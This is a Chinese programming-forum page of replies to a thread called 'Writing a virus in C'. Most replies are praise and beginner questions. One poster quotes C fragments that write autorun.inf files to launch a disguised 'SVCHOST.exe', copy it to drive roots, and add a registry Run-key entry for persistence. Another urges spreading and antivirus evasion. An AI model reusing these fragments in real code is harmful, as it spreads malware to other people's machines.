| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   

密 码:  
共有 25792 人关注过本帖, 22 人收藏
标题:[原创]用C写病毒(1)
只看楼主 加入收藏
小猩猩
等 级:新手上路
帖 子:24
专家分:0
注 册:2007-7-8
得分:0 
偶像啊

ymaozi
帖 子:87
注 册:2007-7-19

有很长时间没有去看C语言,但结合百度和自己以前的记忆还勉强能看得懂一点点!

明知不可为而为之
ymaozi's blog:[url=http://www.][/url]
jianfeng11
帖 子:50
注 册:2007-1-30
得,我也来膜拜下,有点不懂,继续看程序去。

我要成为高手,半个也行。总是个高手吧,哈哈哈哈
无理取闹
等 级:贵宾
威 望:53
帖 子:4264
注 册:2006-7-26
不知道楼主会pe文件修改不 我最近也在学习pe病毒编写 可否学习一下

win32汇编
病毒 加密
目前兴趣所在
无理取闹
等 级:贵宾
威 望:53
帖 子:4264
注 册:2006-7-26
还有我觉得病毒编写重点是传染传播和生存(不被杀毒软件杀掉) 而不是为了破坏

win32汇编
病毒 加密
目前兴趣所在
MengJin112
帖 子:1
注 册:2007-7-22
还是不知道,  它的原理!   什么C:\\windows\\system32  ?  能不能说的具体?
luoshiqi
帖 子:19
注 册:2007-7-25
char *autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"};
char *files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"};
char *files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",
"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",
"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"};
char *regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f";
这里有没有人可以详细说明一下,小弟真的不懂
可可熊
威 望:9
帖 子:553
注 册:2007-6-15
有点意思。
冰天雪
威 望:1
帖 子:331
注 册:2007-2-27
来膜拜楼主啦~~
小野猫
帖 子:53
注 册:2007-7-13
人才啊!!!
大侠可否多多提供一些有关C语言方面的资料,
尤其是您的学习经验提供给我们这些初学者学习借鉴啊???
我代替学习C语言的广大爱好者向您讨教。

快速回复:[原创]用C写病毒(1)
数据加载中...

关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。